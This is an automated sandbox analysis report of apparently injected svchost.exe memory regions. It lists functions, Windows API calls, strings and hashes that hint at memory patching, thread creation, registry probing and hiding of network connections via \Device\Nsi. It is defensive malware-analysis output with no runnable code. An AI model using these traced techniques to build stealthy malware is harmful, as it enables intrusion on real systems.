Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: b53fb69a101e411410a0d71527e0ef8a35960a804745ee84d45a04280a219423
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 99619976519A84CAEAA09B15F55835B77A0F3C8B54F500126EBAE87FA8DF79C580CB00

Function 0000026F47BE12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026F47BE12E0
_set_statfp.LIBCMT ref: 0000026F47BE12FB
_set_statfp.LIBCMT ref: 0000026F47BE1317
_set_statfp.LIBCMT ref: 0000026F47BE1353

Memory Dump Source

Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: ee12453bd28e3afc577396a9ee6065a03c601330e7b9e9a09f2b34c0b2d34c21
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 5E118E32A54E0951FEE41169F75E3AF1171AB54374F784638EB7616FDF8E2A8C428200

Function 0000026F48151EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026F48151EE0
_set_statfp.LIBCMT ref: 0000026F48151EFB
_set_statfp.LIBCMT ref: 0000026F48151F17
_set_statfp.LIBCMT ref: 0000026F48151F53

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 36e19bdb03137a51d94cf8c5fc59f3a0f69a68c42d3294d8d089bc1d08861215
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: E8117032A54A8141FEEA1168F75E36B1041ABF5378F094637AB7607FF68F5ACC464200

Function 0000026F48143878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026F48143886
GetCurrentProcess.KERNEL32 ref: 0000026F481438B4
VirtualProtectEx.KERNEL32 ref: 0000026F481438D6
GetCurrentProcess.KERNEL32 ref: 0000026F481438F4
VirtualProtectEx.KERNEL32 ref: 0000026F48143915

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: b8e4028ec7f43a18d99d9638ff7ffc8236890d2320536a4e9f55bc358984ab51
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 61112E35704B8182FF949B69F50865BA6A0F785B84F440536DFA907BA4EE3EC545C700

Function 0000026F47BD84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026F47BD8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026F47BD8598

Strings

f, xrefs: 0000026F47BD8516
csm, xrefs: 0000026F47BD857E

Memory Dump Source

Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 4d9ae1b0c0e080de0e714dc8f709c2ff647a12b5c7e1cb0a884fe787546435ca
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: AB51AE3661A6008AEF98CF15FA48B5A37B5F340BA9F518134DB8687B8CDF36D841C704

Function 0000026F47BD84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026F47BD8503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026F47BD8598

Strings

f, xrefs: 0000026F47BD8516
csm, xrefs: 0000026F47BD857E

Memory Dump Source

Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: e19394626fe34eb96dd8efde3864e342f7def1404c8e2bb869f0a0b4799960be
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: B2319C7621564086EB98DF11FA48B5A37B4F740B99F158034EF9A07B88CF3AD940C708

Function 0000026F481414B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026F481414D5
HeapFree.KERNEL32 ref: 0000026F481414E4
GetProcessHeap.KERNEL32 ref: 0000026F481414F0
HeapFree.KERNEL32 ref: 0000026F481414FF
GetProcessHeap.KERNEL32 ref: 0000026F4814152A

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: 1d538f3de1b63ca7a5203a6e535e1814286e94e46d15f76940d346a402b40b93
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: DA111C31614BD8D6EB959F6AB98825BB760F7CAF84F44402ADBAA03B64DF39C0518740

Function 0000026F481426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026F481427D4
StrCpyW.SHLWAPI ref: 0000026F481427ED

Strings

\\.\pipe\, xrefs: 0000026F481427DF

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 0c14571bd64e89be7f58fcaf859723aa8e1df4df898fef2d28a9f666c5021b4d
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 63718C722107D186EEA49E29EA583ABA691F7C5F84F440037DF7943F99DE76C5C48700

Function 0000026F481424DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026F481425C3
StrCpyW.SHLWAPI ref: 0000026F481425DA

Strings

\\.\pipe\, xrefs: 0000026F481425CE

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 1a7d86200d537741272481606de6ee0ae843ee6a338ff252bf49d7c2ca6d5db3
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: F05171326047C142EEA59A2AB65C3ABA651B7C5B80F554037DFBA03F99DE37C4C58B40

Function 0000026F48150604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000026F4815071B
GetLastError.KERNEL32 ref: 0000026F4815073D

Strings

U, xrefs: 0000026F481506C7

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: b3b9fd545fef02c50b494694c8c052df8d7fbc415664f389dc348d300d5629c4
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: C7419372714A8081EB60DF65F54839A67A0F3D8B84F444036EFAD87B58EF79C541CB40

Function 0000026F4814D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026F4814D6F9
LCMapStringW.KERNEL32 ref: 0000026F4814D781

Strings

LCMapStringEx, xrefs: 0000026F4814D6DC, 0000026F4814D6ED

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: f9f1f0238fa9a7d8ef8b4d77b25a4db6fee6277e7c02bd8bb4827bb06db8a3ac
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 6B110B76608BC086DBA0CB56F54469AB7A4F7C9B94F544126EFAD83F69DF38C4508B00

Function 0000026F481494A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000026F481494E8
RaiseException.KERNEL32 ref: 0000026F4814952E

Strings

csm, xrefs: 0000026F4814951B

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: cab25d2c1113bc741c96d50252122c4bd7788635da7919d08d2ee0f85be9baa1
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 19111F32218B8082EFA18F15F64425A77A5F7C8F98F584226DFAD0BB64DF39C595CB00

Function 0000026F4814D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026F4814D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000026F4814D6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000026F4814D681

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 63339d3737b61d754a319d26a78aa6ff223a8b853c10df425ee19768a4565bfd
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: B6F05E35310BD091FE859B46F6486966321ABC8B90F885037AB7907F68CE3AC995C700

Function 0000026F47BDCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026F47BDCBC5

Strings

October, xrefs: 0000026F47BDCBBE
November, xrefs: 0000026F47BDCBA8, 0000026F47BDCBB2

Memory Dump Source

Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 9b5508709f5addfd39a5dc0f3005e0e7e63a2167a6cfd7400339a4a95d460fc2
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 1BE0923160854592EE899B51F7482EB26319B88740F695031F71906B5ECF3ACC8A9341

Function 0000026F4814D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026F4814D631
TlsSetValue.KERNEL32 ref: 0000026F4814D648

Strings

FlsSetValue, xrefs: 0000026F4814D61E

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 703f5d37dcab9542a39612fd4a97fb0f881afaf452dae0dd4d49ec64c4b88810
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 68E01B712106C0A1FF855B55FA4D6976322BBC8B80F985137E73D07B65CE3AC895C714

Function 0000026F48141D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026F48141D9B
HeapAlloc.KERNEL32 ref: 0000026F48141DAA
GetProcessHeap.KERNEL32 ref: 0000026F48141E1E
HeapFree.KERNEL32 ref: 0000026F48141E2C

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 73d78c122a87bdf7dcca5161f7a8a029e466978b847249d385330bdd74768ffd
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 4B217136604BD081EE928F69B54829BB3A0FBC9B94F454122DFAD57F24EE79C5828700

Function 0000026F48141274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026F4814127A
HeapAlloc.KERNEL32 ref: 0000026F48141289
GetProcessHeap.KERNEL32 ref: 0000026F481412A3
HeapAlloc.KERNEL32 ref: 0000026F481412B4

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 727563492ac211b6f390472a903689ff5a487115f043112d9d0496eaa73908c2
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: DDE06D7161164086FB458F7AE84834A36E1FBC9F01F88C024CA2907760DF7EC499C740

Analysis Process: svchost.exePID: 652, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	58
Total number of Limit Nodes:	4

Executed Functions

Function 0000029B92343458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000029B9234347A
PathFindFileNameW.SHLWAPI ref: 0000029B92343489

Part of subcall function 0000029B92343930: StrCmpNIW.SHLWAPI ref: 0000029B92343948

Part of subcall function 0000029B92343878: GetModuleHandleW.KERNEL32 ref: 0000029B92343886
Part of subcall function 0000029B92343878: GetCurrentProcess.KERNEL32 ref: 0000029B923438B4
Part of subcall function 0000029B92343878: VirtualProtectEx.KERNEL32 ref: 0000029B923438D6
Part of subcall function 0000029B92343878: GetCurrentProcess.KERNEL32 ref: 0000029B923438F4
Part of subcall function 0000029B92343878: VirtualProtectEx.KERNEL32 ref: 0000029B92343915

CreateThread.KERNEL32 ref: 0000029B923434D7

Part of subcall function 0000029B92341EB4: GetCurrentThread.KERNEL32 ref: 0000029B92341EBF

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 7545b7b13d82f0a91c51c4df479a3f418c653166a1be343f01743be42ddf1b85
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: BC112170F3C60159FF639B21FB4EBA52290BB54774FA400659B5E872D4EF39C0448E50

Function 0000029B92341C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000029B92341650: GetProcessHeap.KERNEL32 ref: 0000029B9234165B
Part of subcall function 0000029B92341650: HeapAlloc.KERNEL32 ref: 0000029B9234166A
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923416DA
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B92341707
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341721
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B92341741
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B9234175C
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B9234177C
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341797
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923417B7
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B923417D2
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923417F2

Sleep.KERNEL32 ref: 0000029B92341C43
SleepEx.KERNELBASE ref: 0000029B92341C49

Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B9234180D
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B9234182D
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341848
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B92341868
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341883
Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923418A3
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B923418BE
Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B923418C8

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 50e732c999ed38b02f108cbd88a1ebb4365d4235e9b54cbc5a8e9805dfd91454
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: DD311565F2CE0199FF529F36FB4936A13A4AB45BF8F0440A2DF8D876D5EF24C8508A50

Function 0000029B92343930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000029B92343948

Strings

dialer, xrefs: 0000029B92343941

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 5e99e09a81be74683ec0735598f19b3f298f7555a9f3a34255cc78f9c769c029
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 61D05E21F3964A8EFF969FA1A9897602360AB04724F4480208F0902114E718898D9E10

Function 0000029B91DD2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000029B91DD2A31

Memory Dump Source

Source File: 0000000F.00000002.2635445548.0000029B91DD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B91DD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b91dd0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 66c3075ca0285acc7c6d9f9d6f17fe1fc06f5ec9c51786bd45666383cfa4d708
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: CB61343A3216508BFB6ACF25E64876DB391FF45B94F548021DB1907B89DB38E853DB20

Function 0000029B923AB860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 0000029B923AB8B5

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: 21f0956d369b2fd1989298c4a3e8b2e9cd9d68041f40b3d614bf662d11e29f15
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: 93F09094F2928589FF576F6AB71D3A532CA6F65B60F4E48308F0A863D2DF2CC4854A10

Function 0000029B9234B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 0000029B9234B8B5

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: ab9c8350d501b43e1f202ce727287e6d5da441a2c231595fbdd7a95b0088cbc8
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: FEF09040F2928589FF576F62BB0839512D26F48B60F0C44708F0A863C2EF2CC4454A10

Non-executed Functions

Function 0000029B923A2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000029B923A2D80
lstrlenW.KERNEL32 ref: 0000029B923A2FBA

Part of subcall function 0000029B923A1A14: OpenProcess.KERNEL32 ref: 0000029B923A1A3A
Part of subcall function 0000029B923A1A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000029B923A1A58
Part of subcall function 0000029B923A1A14: PathFindFileNameW.SHLWAPI ref: 0000029B923A1A67
Part of subcall function 0000029B923A1A14: lstrlenW.KERNEL32 ref: 0000029B923A1A73
Part of subcall function 0000029B923A1A14: StrCpyW.SHLWAPI ref: 0000029B923A1A86
Part of subcall function 0000029B923A1A14: CloseHandle.KERNEL32 ref: 0000029B923A1A94

GetProcAddress.KERNEL32 ref: 0000029B923A2D95

Part of subcall function 0000029B923A1554: StrCmpIW.SHLWAPI ref: 0000029B923A1585

Part of subcall function 0000029B923A3930: StrCmpNIW.SHLWAPI ref: 0000029B923A3948

StrCmpNIW.SHLWAPI ref: 0000029B923A2DD8
lstrlenW.KERNEL32 ref: 0000029B923A2F00

Strings

\Device\Nsi, xrefs: 0000029B923A2DCB
NtQueryObject, xrefs: 0000029B923A2D8B
ntdll.dll, xrefs: 0000029B923A2D79

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 776eacdfa51c99bee4d3fba1db5e26db6f0513538c36716626e5efed290943a5
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 7AB1C232E38A5089FB5A8F26E7487A9B3A4F744BA4F455026EF4A53794DF35CC80CB40

Function 0000029B92342CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000029B92342D80
lstrlenW.KERNEL32 ref: 0000029B92342FBA

Part of subcall function 0000029B92341A14: OpenProcess.KERNEL32 ref: 0000029B92341A3A
